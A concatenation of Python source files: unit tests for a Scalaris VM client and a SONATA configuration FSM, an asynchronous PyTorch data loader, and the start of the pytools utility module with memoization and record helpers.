for name in ok:
self.assertTrue(not name in nodes, str(nodes) + " should not contain " + name)
vm.close_connection()
def testGetOtherVMs_NotConnected(self):
"""Test method for ScalarisVM.getOtherVMs() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.getOtherVMs(0))
vm.getOtherVMs(1)
def testGetOtherVMs1(self):
"""Test method for ScalarisVM.getOtherVMs(1)."""
self._testGetOtherVMs(1)
def testGetOtherVMs2(self):
"""Test method for ScalarisVM.getOtherVMs(2)."""
self._testGetOtherVMs(2)
def testGetOtherVMs3(self):
"""Test method for ScalarisVM.getOtherVMs(3)."""
self._testGetOtherVMs(3)
def _testGetOtherVMs(self, maxVMs):
"""Test method for ScalarisVM.getOtherVMs()."""
vm = ScalarisVM()
otherVMs = vm.getOtherVMs(maxVMs)
self.assertTrue(len(otherVMs) <= maxVMs, "list too long: " + str(otherVMs))
for otherVMUrl in otherVMs:
            otherVM = ScalarisVM(conn = scalaris.JSONConnection(url = otherVMUrl))
otherVM.getInfo()
otherVM.close_connection()
vm.close_connection()
# not tested because we still need the Scalaris Erlang VM:
def _testShutdownVM_NotConnected(self):
"""Test method for ScalarisVM.shutdownVM() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.shutdownVM())
vm.shutdownVM()
# not tested because we still need the Scalaris Erlang VM:
def _testShutdownVM1(self):
"""Test method for ScalarisVM.shutdownVM()."""
vm = ScalarisVM()
vm.shutdownVM()
# not tested because we still need the Scalaris Erlang VM:
def _testKillVM_NotConnected(self):
"""Test method for ScalarisVM.killVM() with a closed connection."""
vm = ScalarisVM()
vm.close_connection()
#self.assertRaises(scalaris.ConnectionError, vm.killVM())
vm.killVM()
# not tested because we still need the Scalaris Erlang VM:
def _testKillVM1(self):
"""Test method for ScalarisVM.killVM()."""
vm = ScalarisVM()
vm.killVM()
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
dataloader.py
|
import threading
import queue
from typing import Iterable, Callable, Optional, Any, Union
import time
import torch
from copy import deepcopy
from ctools.torch_utils import to_device
from .collate_fn import default_collate
class AsyncDataLoader(object):
def __init__(
self,
data_source: Union[Callable, dict],
batch_size: int,
device: str,
chunk_size: Optional[int] = None,
collate_fn: Optional[Callable] = None,
num_workers: int = 0,
use_async=True,
            use_async_cuda=True,  # using async cuda costs extra GPU memory
max_reuse=0,
) -> None:
self.use_async = use_async
self.use_async_cuda = use_async_cuda
self.data_source = data_source
self.batch_size = batch_size
self.device = device
self.use_cuda = isinstance(self.device, int)
if self.use_cuda:
self.stream = torch.cuda.Stream()
if collate_fn is None:
self.collate_fn = default_collate
else:
self.collate_fn = collate_fn
self.num_workers = num_workers
if self.num_workers < 0:
raise ValueError(
'num_workers should be non-negative; '
'use num_workers = 0 or 1 to disable multiprocessing.'
)
self.reuse_count = max_reuse
self.max_reuse = max_reuse
self.cache_data = None
        torch.set_num_threads(max(1, torch.get_num_threads() // 4))  # never request 0 threads
if self.use_async:
self.queue_maxsize = 1
self.worker_queue = queue.Queue(maxsize=1)
self.data_queue = queue.Queue(maxsize=self.queue_maxsize)
self.read_data_thread = threading.Thread(target=self.read_data_loop, args=(), daemon=True)
self.read_data_thread.start()
self.workers = [threading.Thread(target=self._worker_loop, args=(), daemon=True) for _ in range(self.num_workers)]
for w in self.workers:
w.start()
# cuda thread
if self.use_async_cuda:
# the queue to store processed cuda data, user will get data from it if use cuda
self.cuda_queue = queue.Queue(maxsize=self.queue_maxsize)
self.cuda_thread = threading.Thread(target=self._cuda_loop, args=())
self.cuda_thread.daemon = True
self.cuda_thread.start()
def __iter__(self) -> Iterable:
"""
Overview:
Return the iterable self as an iterator
Returns:
- self (:obj:`Iterable`): self as an iterator
"""
return self
def read_data_loop(self) -> None:
while True:
data = self.data_source(self.batch_size)
while self.worker_queue.qsize() > 0: # make sure only last queue has cache data
time.sleep(0.1)
self.worker_queue.put(data)
def _worker_loop(self) -> None:
print('dataloader worker start, threads:{}!!!!!!!!!!!!!!!!!!'.format(torch.get_num_threads()))
while True:
try:
data = self.worker_queue.get()
for i in range(len(data)):
data[i] = data[i]()
except Exception as e:
print(e)
continue
data = self.collate_fn(data)
while self.data_queue.qsize() > 0:
time.sleep(0.1)
self.data_queue.put(data)
def _cuda_loop(self) -> None:
"""
Overview:
Only when using cuda, would this be run as a thread through ``self.cuda_thread``.
            Get data from ``self.data_queue``, move it to the target device and put it into ``self.cuda_queue``
"""
with torch.cuda.stream(self.stream):
while True:
while self.cuda_queue.qsize() > 0:
time.sleep(0.1)
data = self.data_queue.get()
data = to_device(data, self.device)
self.cuda_queue.put(data)
def sync_loop(self):
while True:
            try:
                data = self.data_source(self.batch_size)
                for i in range(len(data)):
                    data[i] = data[i]()
                break
            except Exception as e:
                # surface loading errors instead of silently retrying forever
                print(e)
data = self.collate_fn(data)
if self.use_cuda:
data = to_device(data, self.device)
return data
def __next__(self) -> Any:
"""
Overview:
Return next data in the iterator. If use cuda, get from ``self.cuda_queue``;
            Otherwise, get from ``self.data_queue``.
Returns:
- data (:obj:`torch.Tensor`): next data in the iterator
"""
if self.use_async:
if self.use_cuda:
if self.reuse_count == self.max_reuse:
if self.use_async_cuda:
self.cache_data = self.cuda_queue.get()
else:
self.cache_data = self.data_queue.get()
self.cache_data = to_device(self.cache_data, self.device)
self.reuse_count = 0
else:
self.reuse_count += 1
return self.cache_data
else:
return self.data_queue.get()
else:
return self.sync_loop()
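
# A minimal usage sketch (not part of the original module). It assumes the
# `ctools` imports above resolve and that `default_collate` stacks dict
# samples like torch's default collate. It illustrates the contract the
# loader expects: `data_source(batch_size)` returns a list of zero-argument
# callables, each of which produces one sample when invoked.
if __name__ == '__main__':
    def fake_source(batch_size):
        # every element is a deferred sample loader, as _worker_loop/sync_loop expect
        return [lambda i=i: {'x': torch.randn(4), 'y': torch.tensor(i)} for i in range(batch_size)]

    loader = AsyncDataLoader(fake_source, batch_size=8, device='cpu', use_async=False)
    batch = next(loader)
    print({k: v.shape for k, v in batch.items()})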
|
testConf.py
|
'''
Created on Jun 13, 2017
@author: ubuntu
'''
import unittest
import yaml
import threading
import logging
import time
import sys
from multiprocessing import Process
from fakeFLM import fakeflm
from fakeSMR import fakesmr
from sonmanobase import messaging
from sonfsmvprxsquidconfiguration1.sonfsm_face import faceFSM
logging.basicConfig(level=logging.INFO)
logging.getLogger('amqp-storm').setLevel(logging.INFO)
LOG = logging.getLogger("son-mano-plugins:sm_template_test")
logging.getLogger("son-mano-base:messaging").setLevel(logging.INFO)
LOG.setLevel(logging.DEBUG)
class testConf(unittest.TestCase):
def setUp(self):
self.slm_proc = Process(target= fakeflm)
self.smr_proc = Process(target= fakesmr)
self.con_proc = Process(target= faceFSM)
self.slm_proc.daemon = True
self.smr_proc.daemon = True
self.con_proc.daemon = True
self.manoconn = messaging.ManoBrokerRequestResponseConnection('ConfTest')
self.wait_for_reg_event = threading.Event()
self.wait_for_reg_event.clear()
self.wait_for_res_event = threading.Event()
self.wait_for_res_event.clear()
def tearDown(self):
if self.smr_proc is not None:
self.smr_proc.terminate()
del self.smr_proc
if self.slm_proc is not None:
self.slm_proc.terminate()
del self.slm_proc
if self.con_proc is not None:
self.con_proc.terminate()
del self.con_proc
try:
self.manoconn.stop_connection()
except Exception as e:
LOG.exception("Stop connection exception.")
def reg_eventFinished(self):
self.wait_for_reg_event.set()
def res_eventFinished(self):
self.wait_for_res_event.set()
def waitForRegEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_reg_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def waitForResEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_res_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def test_configuration_fsm(self):
def on_register_receive(ch, method, properties, message):
LOG.debug('on_register_receive with id=%s, message=%s', properties.app_id, message)
if properties.app_id != 'fake-smr':
msg = yaml.load(message)
# CHECK: The message should be a dictionary.
self.assertTrue(isinstance(msg, dict), msg='message is not a dictionary')
# CHECK: The dictionary should have a key 'specific_manager_name'.
self.assertIn('specific_manager_name', msg.keys(), msg='no specific_manager_name provided in message.')
if isinstance(msg['specific_manager_name'], str):
# CHECK: The value of 'specific_manager_name' should not be an empty string.
self.assertTrue(len(msg['specific_manager_name']) > 0, msg='empty specific_manager_name provided.')
else:
# CHECK: The value of 'specific_manager_name' should be a string
self.assertEqual(True, False, msg='specific_manager_name is not a string')
# CHECK: The dictionary should have a key 'version'.
self.assertIn('version', msg.keys(), msg='No version provided in message.')
if isinstance(msg['version'], str):
# CHECK: The value of 'version' should not be an empty string.
self.assertTrue(len(msg['version']) > 0, msg='empty version provided.')
else:
# CHECK: The value of 'version' should be a string
self.assertEqual(True, False, msg='version is not a string')
# CHECK: The dictionary should have a key 'description'
self.assertIn('description', msg.keys(), msg='No description provided in message.')
if isinstance(msg['description'], str):
# CHECK: The value of 'description' should not be an empty string.
self.assertTrue(len(msg['description']) > 0, msg='empty description provided.')
else:
# CHECK: The value of 'description' should be a string
self.assertEqual(True, False, msg='description is not a string')
# CHECK: The dictionary should have a key 'specific_manager_type'
if isinstance(msg['specific_manager_type'], str):
# CHECK: The value of 'specific_manager_type' should not be an empty string.
self.assertTrue(len(msg['specific_manager_type']) > 0, msg='empty specific_manager_type provided.')
else:
# CHECK: The value of 'specific_manager_type' should be a string
self.assertEqual(True, False, msg='specific_manager_type is not a string')
# CHECK: The dictionary should have a key 'service_name'
if isinstance(msg['service_name'], str):
# CHECK: The value of 'service_name' should not be an empty string.
self.assertTrue(len(msg['service_name']) > 0, msg='empty service_name id provided.')
else:
# CHECK: The value of 'service_name' should be a string
self.assertEqual(True, False, msg='service_name is not a string')
self.reg_eventFinished()
def on_ip_receive(ch, method, properties, message):
LOG.info('on_ip_receive message=%s', message)
LOG.info('app_id = %s', properties.app_id)
if properties.app_id == 'sonfsmvprxsquidconfiguration1':
payload = yaml.load(message)
LOG.info('IP = %s', payload['IP'])
self.assertTrue(isinstance(payload, dict), msg='message is not a dictionary')
if isinstance(payload['IP'], str):
self.assertTrue(payload['IP'] == "10.100.32.250", msg='Wrong IP address')
else:
self.assertEqual(True, False, msg='IP address is not a string')
self.res_eventFinished()
self.smr_proc.start()
time.sleep(4)
self.manoconn.subscribe(on_register_receive, 'specific.manager.registry.ssm.registration')
self.con_proc.start()
#time.sleep(4)
self.waitForRegEvent(timeout=5, msg="Registration request not received.")
        LOG.info("Registration request received; acknowledging registration.")
        self.con_proc.on_registration_ok()
        LOG.info("Registration acknowledged.")
self.manoconn.subscribe(on_ip_receive, 'son.configuration')
#time.sleep(4)
self.slm_proc.start()
#time.sleep(4)
self.waitForResEvent(timeout=5, msg="Configuration request not received.")
if __name__ == '__main__':
unittest.main()
|
__init__.py
|
# pylint: disable=too-many-lines
# (Yes, it has a point!)
__copyright__ = "Copyright (C) 2009-2013 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from functools import reduce, wraps
import operator
import sys
import logging
from typing import (
Any, Callable, Dict, Iterable, List, Optional, Set, Tuple, TypeVar)
import builtins
from sys import intern
decorator_module = __import__("decorator", level=0)
my_decorator = decorator_module.decorator
# These are deprecated and will go away in 2022.
all = builtins.all
any = builtins.any
__doc__ = """
A Collection of Utilities
=========================
Math
----
.. autofunction:: levi_civita
.. autofunction:: perm
.. autofunction:: comb
Assertive accessors
-------------------
.. autofunction:: one
.. autofunction:: is_single_valued
.. autofunction:: all_roughly_equal
.. autofunction:: single_valued
Memoization
-----------
.. autofunction:: memoize
.. autofunction:: memoize_on_first_arg
.. autofunction:: memoize_method
.. autofunction:: memoize_in
.. autofunction:: keyed_memoize_on_first_arg
.. autofunction:: keyed_memoize_method
Argmin/max
----------
.. autofunction:: argmin2
.. autofunction:: argmax2
.. autofunction:: argmin
.. autofunction:: argmax
Cartesian products
------------------
.. autofunction:: cartesian_product
.. autofunction:: distinct_pairs
Permutations, Tuples, Integer sequences
---------------------------------------
.. autofunction:: wandering_element
.. autofunction:: generate_nonnegative_integer_tuples_below
.. autofunction:: generate_nonnegative_integer_tuples_summing_to_at_most
.. autofunction:: generate_all_nonnegative_integer_tuples
.. autofunction:: generate_all_integer_tuples_below
.. autofunction:: generate_all_integer_tuples
.. autofunction:: generate_permutations
.. autofunction:: generate_unique_permutations
Formatting
----------
.. autoclass:: Table
.. autofunction:: string_histogram
.. autofunction:: word_wrap
Debugging
---------
.. autofunction:: typedump
.. autofunction:: invoke_editor
Progress bars
-------------
.. autoclass:: ProgressBar
Name generation
---------------
.. autofunction:: generate_unique_names
.. autofunction:: generate_numbered_unique_names
.. autoclass:: UniqueNameGenerator
Deprecation Warnings
--------------------
.. autofunction:: deprecate_keyword
Functions for dealing with (large) auxiliary files
--------------------------------------------------
.. autofunction:: download_from_web_if_not_present
Helpers for :mod:`numpy`
------------------------
.. autofunction:: reshaped_view
Timing data
-----------
.. data:: SUPPORTS_PROCESS_TIME
A :class:`bool` indicating whether :class:`ProcessTimer` measures elapsed
process time (available on Python 3.3+).
.. autoclass:: ProcessTimer
Log utilities
-------------
.. autoclass:: ProcessLogger
.. autoclass:: DebugProcessLogger
.. autoclass:: log_process
Sorting in natural order
------------------------
.. autofunction:: natorder
.. autofunction:: natsorted
Type Variables Used
-------------------
.. class:: T
Any type.
.. class:: F
Any callable.
"""
# {{{ type variables
T = TypeVar("T")
F = TypeVar("F", bound=Callable[..., Any])
# }}}
# {{{ code maintenance
class MovedFunctionDeprecationWrapper:
def __init__(self, f, deadline=None):
if deadline is None:
deadline = "the future"
self.f = f
self.deadline = deadline
def __call__(self, *args, **kwargs):
from warnings import warn
warn(f"This function is deprecated and will go away in {self.deadline}. "
f"Use {self.f.__module__}.{self.f.__name__} instead.",
DeprecationWarning, stacklevel=2)
return self.f(*args, **kwargs)
def deprecate_keyword(oldkey: str,
newkey: Optional[str] = None, *,
deadline: Optional[str] = None):
"""Decorator used to deprecate function keyword arguments.
:arg oldkey: deprecated argument name.
:arg newkey: new argument name that serves the same purpose, if any.
:arg deadline: expected time frame for the removal of the deprecated argument.
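
    A minimal usage sketch (``old``/``new`` are made-up keyword names)::

        @deprecate_keyword("old", "new", deadline="2024")
        def f(*, new=None):
            return new

        f(old=3)   # warns and forwards the value to ``new``, returning 3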
"""
from warnings import warn
if deadline is None:
deadline = "the future"
def wrapper(func):
@wraps(func)
def inner_wrapper(*args, **kwargs):
if oldkey in kwargs:
if newkey is None:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}.",
DeprecationWarning, stacklevel=2)
else:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}. "
f"Use '{newkey}' instead.",
DeprecationWarning, stacklevel=2)
if newkey in kwargs:
raise ValueError(f"Cannot use '{oldkey}' "
f"and '{newkey}' in the same call.")
kwargs[newkey] = kwargs[oldkey]
del kwargs[oldkey]
return func(*args, **kwargs)
return inner_wrapper
return wrapper
# }}}
# {{{ math --------------------------------------------------------------------
def delta(x, y):
if x == y:
return 1
else:
return 0
def levi_civita(tup):
"""Compute an entry of the Levi-Civita tensor for the indices *tuple*."""
if len(tup) == 2:
i, j = tup
return j-i
if len(tup) == 3:
i, j, k = tup
return (j-i)*(k-i)*(k-j)/2
else:
raise NotImplementedError
def factorial(n):
from operator import mul
assert n == int(n)
return reduce(mul, (i for i in range(1, n+1)), 1)
def perm(n, k):
"""Return P(n, k), the number of permutations of length k drawn from n
choices.
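
    For example::

        >>> perm(4, 2)
        12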
"""
result = 1
assert k > 0
while k:
result *= n
n -= 1
k -= 1
return result
def comb(n, k):
"""Return C(n, k), the number of combinations (subsets)
of length k drawn from n choices.
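
    For example::

        >>> comb(4, 2)
        6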
"""
return perm(n, k)//factorial(k)
def norm_1(iterable):
return sum(abs(x) for x in iterable)
def norm_2(iterable):
return sum(x**2 for x in iterable)**0.5
def norm_inf(iterable):
return max(abs(x) for x in iterable)
def norm_p(iterable, p):
return sum(i**p for i in iterable)**(1/p)
class Norm:
def __init__(self, p):
self.p = p
def __call__(self, iterable):
return sum(i**self.p for i in iterable)**(1/self.p)
# }}}
# {{{ data structures
# {{{ record
class RecordWithoutPickling:
"""An aggregate of named sub-variables. Assumes that each record sub-type
will be individually derived from this class.
"""
__slots__: List[str] = []
def __init__(self, valuedict=None, exclude=None, **kwargs):
assert self.__class__ is not Record
if exclude is None:
exclude = ["self"]
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
if valuedict is not None:
kwargs.update(valuedict)
for key, value in kwargs.items():
if key not in exclude:
fields.add(key)
setattr(self, key, value)
def get_copy_kwargs(self, **kwargs):
for f in self.__class__.fields:
if f not in kwargs:
try:
kwargs[f] = getattr(self, f)
except AttributeError:
pass
return kwargs
def copy(self, **kwargs):
return self.__class__(**self.get_copy_kwargs(**kwargs))
def __repr__(self):
return "{}({})".format(
self.__class__.__name__,
", ".join("{}={!r}".format(fld, getattr(self, fld))
for fld in self.__class__.fields
if hasattr(self, fld)))
def register_fields(self, new_fields):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
fields.update(new_fields)
def __getattr__(self, name):
# This method is implemented to avoid pylint 'no-member' errors for
# attribute access.
raise AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
class Record(RecordWithoutPickling):
__slots__: List[str] = []
def __getstate__(self):
return {
key: getattr(self, key)
for key in self.__class__.fields
if hasattr(self, key)}
def __setstate__(self, valuedict):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
for key, value in valuedict.items():
fields.add(key)
setattr(self, key, value)
def __eq__(self, other):
return (self.__class__ == other.__class__
and self.__getstate__() == other.__getstate__())
def __ne__(self, other):
return not self.__eq__(other)
class ImmutableRecordWithoutPickling(RecordWithoutPickling):
"""Hashable record. Does not explicitly enforce immutability."""
def __init__(self, *args, **kwargs):
RecordWithoutPickling.__init__(self, *args, **kwargs)
self._cached_hash = None
def __hash__(self):
if self._cached_hash is None:
self._cached_hash = hash(
(type(self),) + tuple(getattr(self, field)
for field in self.__class__.fields))
return self._cached_hash
class ImmutableRecord(ImmutableRecordWithoutPickling, Record):
pass
# }}}
class Reference:
def __init__(self, value):
self.value = value
def get(self):
from warnings import warn
warn("Reference.get() is deprecated -- use ref.value instead")
return self.value
def set(self, value):
self.value = value
class FakeList:
def __init__(self, f, length):
self._Length = length
self._Function = f
def __len__(self):
return self._Length
def __getitem__(self, index):
try:
return [self._Function(i)
for i in range(*index.indices(self._Length))]
except AttributeError:
return self._Function(index)
# {{{ dependent dictionary ----------------------------------------------------
class DependentDictionary:
def __init__(self, f, start=None):
if start is None:
start = {}
self._Function = f
self._Dictionary = start.copy()
def copy(self):
return DependentDictionary(self._Function, self._Dictionary)
def __contains__(self, key):
try:
self[key] # pylint: disable=pointless-statement
return True
except KeyError:
return False
def __getitem__(self, key):
try:
return self._Dictionary[key]
except KeyError:
return self._Function(self._Dictionary, key)
def __setitem__(self, key, value):
self._Dictionary[key] = value
def genuineKeys(self): # noqa
return list(self._Dictionary.keys())
def iteritems(self):
return self._Dictionary.items()
def iterkeys(self):
return self._Dictionary.keys()
def itervalues(self):
return self._Dictionary.values()
# }}}
# }}}
# {{{ assertive accessors
def one(iterable: Iterable[T]) -> T:
"""Return the first entry of *iterable*. Assert that *iterable* has only
that one entry.
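
    For example::

        >>> one([5])
        5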
"""
it = iter(iterable)
try:
v = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'one()'")
def no_more():
try:
next(it)
raise ValueError("iterable with more than one entry passed to 'one()'")
except StopIteration:
return True
assert no_more()
return v
def is_single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> bool:
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
        raise ValueError("empty iterable passed to 'is_single_valued()'")
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
all_equal = is_single_valued
def all_roughly_equal(iterable, threshold):
return is_single_valued(iterable,
equality_pred=lambda a, b: abs(a-b) < threshold)
def single_valued(
iterable: Iterable[T],
equality_pred: Callable[[T, T], bool] = operator.eq
) -> T:
"""Return the first entry of *iterable*; Assert that other entries
    are the same as the first entry of *iterable*.
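
    For example::

        >>> single_valued([3, 3, 3])
        3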
"""
it = iter(iterable)
try:
first_item = next(it)
except StopIteration:
raise ValueError("empty iterable passed to 'single_valued()'")
def others_same():
for other_item in it:
if not equality_pred(other_item, first_item):
return False
return True
assert others_same()
return first_item
# }}}
# {{{ memoization / attribute storage
def memoize(*args: F, **kwargs: Any) -> F:
"""Stores previously computed function values in a cache.
Two keyword-only arguments are supported:
:arg use_kwargs: Allows the caller to use keyword arguments. Defaults to
``False``. Setting this to ``True`` has a non-negligible performance
impact.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
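
    A minimal usage sketch::

        @memoize
        def fib(n):
            return n if n < 2 else fib(n - 1) + fib(n - 2)

        fib(30)   # repeated calls with the same argument hit the cache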
"""
use_kw = bool(kwargs.pop("use_kwargs", False))
default_key_func: Optional[Callable[..., Any]]
if use_kw:
def default_key_func(*inner_args, **inner_kwargs): # noqa pylint:disable=function-redefined
return inner_args, frozenset(inner_kwargs.items())
else:
default_key_func = None
key_func = kwargs.pop("key", default_key_func)
if kwargs:
raise TypeError(
"memoize received unexpected keyword arguments: %s"
% ", ".join(list(kwargs.keys())))
if key_func is not None:
@my_decorator
def _deco(func, *args, **kwargs):
# by Michele Simionato
# http://www.phyast.pitt.edu/~micheles/python/
key = key_func(*args, **kwargs)
try:
return func._memoize_dic[key] # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args, **kwargs)
func._memoize_dic = {key: result} # pylint: disable=protected-access
return result
except KeyError:
result = func(*args, **kwargs)
func._memoize_dic[key] = result # pylint: disable=protected-access
return result
else:
@my_decorator
def _deco(func, *args):
# by Michele Simionato
# http://www.phyast.pitt.edu/~micheles/python/
try:
return func._memoize_dic[args] # pylint: disable=protected-access
except AttributeError:
# _memoize_dic doesn't exist yet.
result = func(*args)
func._memoize_dic = {args: result} # pylint:disable=protected-access
return result
except KeyError:
result = func(*args)
func._memoize_dic[args] = result # pylint: disable=protected-access
return result
if not args:
return _deco
if callable(args[0]) and len(args) == 1:
return _deco(args[0])
    raise TypeError(
        "memoize received unexpected positional arguments: %s" % args)
FunctionValueCache = memoize
class _HasKwargs:
pass
def memoize_on_first_arg(function, cache_dict_name=None):
    """Like :func:`memoize_method`, but for functions that take the object
    in which memoization information is stored as the first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
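
    A minimal usage sketch (``mesh`` stands in for any object that can carry
    attributes)::

        @memoize_on_first_arg
        def nnodes(mesh):
            return len(mesh.nodes)   # the result is cached on ``mesh``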
"""
if cache_dict_name is None:
cache_dict_name = intern("_memoize_dic_"
+ function.__module__ + function.__name__)
def wrapper(obj, *args, **kwargs):
if kwargs:
key = (_HasKwargs, frozenset(kwargs.items())) + args
else:
key = args
try:
return getattr(obj, cache_dict_name)[key]
except AttributeError:
result = function(obj, *args, **kwargs)
setattr(obj, cache_dict_name, {key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[key] = result
return result
def clear_cache(obj):
delattr(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
def memoize_method(method: F) -> F:
"""Supports cache deletion via ``method_name.clear_cache(self)``.
"""
return memoize_on_first_arg(method, intern("_memoize_dic_"+method.__name__))
class keyed_memoize_on_first_arg: # noqa: N801
"""Like :func:`memoize_method`, but for functions that take the object
in which memoization information is stored as first argument.
Supports cache deletion via ``function_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
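
    A minimal usage sketch (``Mesh``/``refine`` are made-up names)::

        class Mesh:
            pass

        @keyed_memoize_on_first_arg(key=lambda tol: round(tol, 6))
        def refine(mesh, tol):
            return [tol]   # cached on ``mesh``, keyed by the rounded tolerance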
"""
def __init__(self, key, cache_dict_name=None):
self.key = key
self.cache_dict_name = cache_dict_name
def _default_cache_dict_name(self, function):
return intern("_memoize_dic_"
+ function.__module__ + function.__name__)
def __call__(self, function):
cache_dict_name = self.cache_dict_name
key = self.key
if cache_dict_name is None:
cache_dict_name = self._default_cache_dict_name(function)
def wrapper(obj, *args, **kwargs):
cache_key = key(*args, **kwargs)
try:
return getattr(obj, cache_dict_name)[cache_key]
except AttributeError:
result = function(obj, *args, **kwargs)
setattr(obj, cache_dict_name, {cache_key: result})
return result
except KeyError:
result = function(obj, *args, **kwargs)
getattr(obj, cache_dict_name)[cache_key] = result
return result
def clear_cache(obj):
delattr(obj, cache_dict_name)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, function)
new_wrapper.clear_cache = clear_cache
return new_wrapper
class keyed_memoize_method(keyed_memoize_on_first_arg): # noqa: N801
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg key: A function receiving the same arguments as the decorated function
which computes and returns the cache key.
.. versionadded :: 2020.3
"""
def _default_cache_dict_name(self, function):
return intern("_memoize_dic_" + function.__name__)
def memoize_method_with_uncached(uncached_args=None, uncached_kwargs=None):
"""Supports cache deletion via ``method_name.clear_cache(self)``.
:arg uncached_args: a list of argument numbers
(0-based, not counting 'self' argument)
"""
from warnings import warn
warn("memoize_method_with_uncached is deprecated and will go away in 2022. "
"Use memoize_method_with_key instead",
DeprecationWarning,
stacklevel=2)
if uncached_args is None:
uncached_args = []
if uncached_kwargs is None:
uncached_kwargs = set()
# delete starting from the end
uncached_args = sorted(uncached_args, reverse=True)
uncached_kwargs = list(uncached_kwargs)
def parametrized_decorator(method):
cache_dict_name = intern("_memoize_dic_"+method.__name__)
def wrapper(self, *args, **kwargs):
cache_args = list(args)
cache_kwargs = kwargs.copy()
for i in uncached_args:
if i < len(cache_args):
cache_args.pop(i)
cache_args = tuple(cache_args)
if kwargs:
for name in uncached_kwargs:
cache_kwargs.pop(name, None)
key = (
(_HasKwargs, frozenset(cache_kwargs.items()))
+ cache_args)
else:
key = cache_args
try:
return getattr(self, cache_dict_name)[key]
except AttributeError:
result = method(self, *args, **kwargs)
setattr(self, cache_dict_name, {key: result})
return result
except KeyError:
result = method(self, *args, **kwargs)
getattr(self, cache_dict_name)[key] = result
return result
def clear_cache(self):
delattr(self, cache_dict_name)
if sys.version_info >= (2, 5):
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, method)
new_wrapper.clear_cache = clear_cache
return new_wrapper
return parametrized_decorator
def memoize_method_nested(inner):
"""Adds a cache to a function nested inside a method. The cache is attached
to *memoize_cache_context* (if it exists) or *self* in the outer (method)
namespace.
Requires Python 2.5 or newer.
"""
from warnings import warn
warn("memoize_method_nested is deprecated and will go away in 2021. "
"Use @memoize_in(self, 'identifier') instead", DeprecationWarning,
stacklevel=2)
cache_dict_name = intern("_memoize_inner_dic_%s_%s_%d"
% (inner.__name__, inner.__code__.co_filename,
inner.__code__.co_firstlineno))
from inspect import currentframe
outer_frame = currentframe().f_back
cache_context = outer_frame.f_locals.get("memoize_cache_context")
if cache_context is None:
cache_context = outer_frame.f_locals.get("self")
try:
cache_dict = getattr(cache_context, cache_dict_name)
except AttributeError:
cache_dict = {}
setattr(cache_context, cache_dict_name, cache_dict)
@wraps(inner)
def new_inner(*args):
try:
return cache_dict[args]
except KeyError:
result = inner(*args)
cache_dict[args] = result
return result
return new_inner
class memoize_in: # noqa
"""Adds a cache to a function nested inside a method. The cache is attached
to *container*.
.. versionchanged :: 2020.3
*identifier* no longer needs to be a :class:`str`,
but it needs to be hashable.
"""
def __init__(self, container, identifier):
try:
memoize_in_dict = container._pytools_memoize_in_dict
except AttributeError:
memoize_in_dict = {}
container._pytools_memoize_in_dict = memoize_in_dict
self.cache_dict = memoize_in_dict.setdefault(identifier, {})
def __call__(self, inner):
@wraps(inner)
def new_inner(*args):
try:
return self.cache_dict[args]
except KeyError:
result = inner(*args)
self.cache_dict[args] = result
return result
return new_inner
# }}}
# {{{ syntactical sugar
class InfixOperator:
"""Pseudo-infix operators that allow syntax of the kind `op1 <<operator>> op2'.
Following a recipe from
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/384122
"""
def __init__(self, function):
self.function = function
def __rlshift__(self, other):
return InfixOperator(lambda x: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def call(self, a, b):
return self.function(a, b)
def monkeypatch_method(cls):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def monkeypatch_class(_name, bases, namespace):
# from GvR, http://mail.python.org/pipermail/python-dev/2008-January/076194.html
assert len(bases) == 1, "Exactly one base class required"
base = bases[0]
